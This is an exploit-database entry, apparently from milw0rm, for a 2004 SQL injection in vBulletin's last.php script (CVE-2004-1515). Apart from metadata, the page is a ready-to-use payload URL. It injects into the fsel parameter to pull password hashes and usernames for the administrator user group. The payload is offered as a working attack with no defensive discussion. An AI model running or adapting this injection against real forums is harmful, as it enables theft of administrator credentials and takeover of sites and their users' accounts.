vBulletin - 'LAST.php' SQL Injection



EKU-ID: 8796 CVE: OSVDB-11701;CVE-2004-1515 OSVDB-ID:
Author: anonymous Published: 2004-11-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Example:

http://www.example.com/last.php?fsel=,user.password%20as%20title,user.%20%20%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201

# milw0rm.com [2004-11-15]